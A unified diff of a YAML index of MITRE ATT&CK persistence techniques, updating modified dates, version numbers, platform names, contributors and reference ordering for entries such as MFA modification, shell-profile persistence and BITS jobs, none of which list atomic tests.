       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -33643,11 +34054,12 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33676,24 +34088,26 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -33728,9 +34142,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1505.004:
     technique:
@@ -33790,7 +34201,7 @@ persistence:
         description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
           on Targets in the Middle East. Retrieved July 6, 2018.
         source_name: Unit 42 RGDoor Jan 2018
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:06:24.161Z'
       name: IIS Components
       description: |-
         Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -33815,13 +34226,11 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.004
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -33874,8 +34283,8 @@ persistence:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -33923,78 +34332,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -34042,6 +34384,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -34052,9 +34398,13 @@ persistence:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -34063,8 +34413,67 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1547.002:
@@ -34101,7 +34510,7 @@ persistence:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -34124,12 +34533,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -34207,41 +34615,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1137.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
-      type: attack-pattern
-      created: '2019-11-07T20:09:56.536Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.004
-        url: https://attack.mitre.org/techniques/T1137/004
-      - source_name: SensePost Outlook Home Page
-        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
-        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
-          Ruler Vector. Retrieved February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:13.742Z'
       name: 'Office Application Startup: Outlook Home Page'
       description: |
         Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -34250,27 +34628,54 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+      created: '2019-11-07T20:09:56.536Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/004
+        external_id: T1137.004
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Home Page
+        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+          Ruler Vector. Retrieved February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.004
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -34331,7 +34736,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -34375,7 +34779,7 @@ persistence:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -34397,7 +34801,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -34478,7 +34881,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -34501,7 +34903,7 @@ persistence:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -34531,12 +34933,10 @@ persistence:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -34626,12 +35026,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34716,7 +35115,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -34781,18 +35179,17 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34825,10 +35222,9 @@ persistence:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -34865,7 +35261,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.001:
     technique:
@@ -34939,7 +35334,7 @@ persistence:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34967,12 +35362,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1505:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T21:18:29.349Z'
       name: Server Software Component
       description: 'Adversaries may abuse legitimate extensible development features
         of servers to establish persistent access to systems. Enterprise server applications
@@ -35031,33 +35425,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -35078,6 +35449,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -35092,52 +35464,42 @@ persistence:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
